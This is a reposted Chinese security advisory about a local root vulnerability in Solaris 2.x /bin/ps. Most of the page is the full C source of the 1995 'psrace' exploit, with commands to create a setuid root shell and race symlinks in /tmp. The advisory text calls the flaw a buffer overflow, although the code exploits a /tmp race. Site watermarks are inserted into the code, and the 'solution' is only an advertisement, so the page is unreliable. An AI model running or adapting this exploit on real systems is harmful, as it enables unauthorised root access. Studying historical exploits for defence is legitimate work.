涉及程序:
/bin/ps
描述:
Solaris 2.x (Sunos 5.x)中的ps漏洞
详细:
/bin/ps存在缓冲区溢出漏洞,可让攻击者获得root权限。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
/*
* psrace.c
*
* Copyright, 1995, by Scott Chasin (chasin@crimelab.com)
*
* This material is copyrighted by Scott Chasin, 1995. The
* usual standard disclaimer applies, especially the fact that the
* author is not liable for any damages caused by direct or indirect
* use of the information or functionality provided by this program.
*
* [ For solaris2.x only ]
*
* After compiling psrace, run the following commands:
*
* cp /bin/ksh $HOME/rootshell; chmod 14755 $HOME/rootshell
* /bin/sh -c 'while /bin/true ; do ps > /dev/null ; done' &
* ./psrace $HOME/rootshell
*
* (Ignore any errors you get from ps)
* You may have to wait a few minutes before the race is won.
*/
网管网www.bitscn.com
#include <stdio.h>
#include <sys/types.h>
#include <dirent.h>
#include <sys/stat.h>
main (argc, argv)
int argc;
char **argv;
{
int count = 0;
DIR *dirp;
struct dirent *dp;
struct stat fileinfo;
char targetfile [85], name [85];
if (argc != 2)
{
printf ("Usage: psrace [/full/path/to/target/filename]\n");
exit (1);
}
if (access (argv[1], 0))
{
printf ("psrace: %s does not exist.\n", argv[1]);
exit (1);
}
strcpy (targetfile, argv[1]);
stat ("/tmp", &fileinfo);
if (fileinfo.st_mode & S_ISVTX)
{
printf ("psrace: Congratulations! You already have the fix in place.\n");
printf ("psrace: (/tmp has the sticky-bit set)\n");
exit (1);
}
printf ("Be patient, this could take awhile.\n");
网管下载dl.bitscn.com printf ("Starting the race .. ");
fflush (stdout);
dirp = opendir ("/tmp");
for (;;)
{
unlink ("/tmp/ps_data");
while ((dp = readdir (dirp)) != NULL)
{
if (!strncmp (dp->d_name, "ps.", 3))
{
sprintf (name, "/tmp/%s", dp->d_name);
unlink (name);
symlink (targetfile, name);
if (stat (targetfile, &fileinfo) >= 0)
if (fileinfo.st_uid == 0)
{
printf ("We WON!\n");
closedir (dirp);
clean_up ();
}
}
}
rewinddir (dirp);
}
}
clean_up ()
{
DIR *dirp;
struct dirent *dp;
char name [25];
dirp = opendir ("/tmp");
while ((dp = readdir (dirp)) != NULL)
网管bitscn_com if (!strncmp (dp->d_name, "ps.", 3))
{
sprintf (name, "/tmp/%s", dp->d_name);
unlink (name);
}
closedir (dirp);
unlink ("/tmp/ps_data");
exit (0);
}
受影响的系统:
Solaris 2.x
SunOS 5.x
解决方案:
CNNS为您提供完善的网络安全服务。
评论加载中…
